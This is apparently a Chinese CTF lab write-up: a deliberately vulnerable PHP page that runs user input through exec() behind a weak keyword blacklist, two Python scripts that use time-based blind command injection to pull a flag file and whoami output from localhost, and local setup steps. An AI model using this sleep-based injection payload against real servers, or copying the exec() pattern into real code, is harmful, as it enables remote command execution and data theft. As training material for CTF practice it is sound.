RCE的CTF题目环境和做题复现第1集

最新推荐文章于 2025-08-22 21:23:13 发布

原创最新推荐文章于 2025-08-22 21:23:13 发布 · 257 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#ctf

网络安全靶场实战演习专栏收录该内容

18 篇文章

订阅专栏

1 通过wsl的ubuntu环境部署

2 题目

http://127.0.0.1/bypass1/bypass1.php

<?php
highlight_file(__FILE__);

$a = $_GET['a'];
if(!preg_match("/shlecholls|curl|wget|\"|'|\?|\*|>|</i",$a)){
    @exec($a);  // 执行用户输入的命令
}else{
    die("Hacker");  // 过滤时显示错误
}

3 EXP

3.1 exp1

import time
import requests
import string

url = "http://127.0.0.1/bypass1/bypass1.php?a="
dicts = string.printable
command = "cat ./flag"
result = ""

for i in range(1,50):
    for j in dicts:
        payload = "sleep $({}|cut -c {}|tr {} 3)".format(command, i, j)
        start = time.time()
        requests.get(url+payload)
        end = time.time()
        if end-start >= 3:
            result += j
            print(result)
            break

3.2 exp2

import time
import requests
import string

url = "http://127.0.0.1/bypass1/bypass1.php?a="
dicts = string.printable
command = "whoami"
result = ""

for i in range(1,50):
    for j in dicts:
        payload = "sleep $({}|cut -c {}|tr {} 3)".format(command, i, j)
        start = time.time()
        requests.get(url+payload)
        end = time.time()
        if end-start >= 3:
            result += j
            print(result)
            break

4 解题过程

4.0.1 在wsl的ubuntu上安装php环境

Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:

sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:

autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:

sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:

sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:

# Disable old PHP module (if any)
sudo a2dismod php7.0  # or whatever version you had before

# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2

4.0.2 /var/www/html配置普通账户可读可写可执行权限

(base) gpu3090@DESKTOP-8IU6393:~$ chown  gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown  gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成  anaconda3  cookies.txt  downloads  snap  summaries  tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$

4.0.3 将题目代码和flag存放到/var/www/html/相应的位置

在这里插入图片描述

4.1 在vscode上运行上面的EXP的php脚本

需要安装插件php debug 和php Server

在这里插入图片描述

4.2 vscode运行exp的php脚本

(base) gpu3090@DESKTOP-8IU6393:/var/www/html$ /usr/bin/python3 /var/www/html/bypass1/bypass_exp.py
f
fl
fla
flag
flag{
flag{T
flag{Th
flag{Thi
flag{Thi0
flag{Thi0_
flag{Thi0_1
flag{Thi0_1s
flag{Thi0_1s_
flag{Thi0_1s_d
flag{Thi0_1s_di
flag{Thi0_1s_dif
flag{Thi0_1s_diff
flag{Thi0_1s_diffi
flag{Thi0_1s_diffic
flag{Thi0_1s_difficu
flag{Thi0_1s_difficul
flag{Thi0_1s_difficult
flag{Thi0_1s_difficult_
flag{Thi0_1s_difficult_y
flag{Thi0_1s_difficult_yo
flag{Thi0_1s_difficult_you
flag{Thi0_1s_difficult_you_
flag{Thi0_1s_difficult_you_a
flag{Thi0_1s_difficult_you_ar
flag{Thi0_1s_difficult_you_are
flag{Thi0_1s_difficult_you_are_
flag{Thi0_1s_difficult_you_are_g
flag{Thi0_1s_difficult_you_are_go
flag{Thi0_1s_difficult_you_are_goo
flag{Thi0_1s_difficult_you_are_good
flag{Thi0_1s_difficult_you_are_good}

(base) gpu3090@DESKTOP-8IU6393:/var/www/html$ /usr/bin/python3 /var/www/html/bypass1/bypass_exp1.py
w
ww
www
www-
www-d
www-da
www-dat
www-data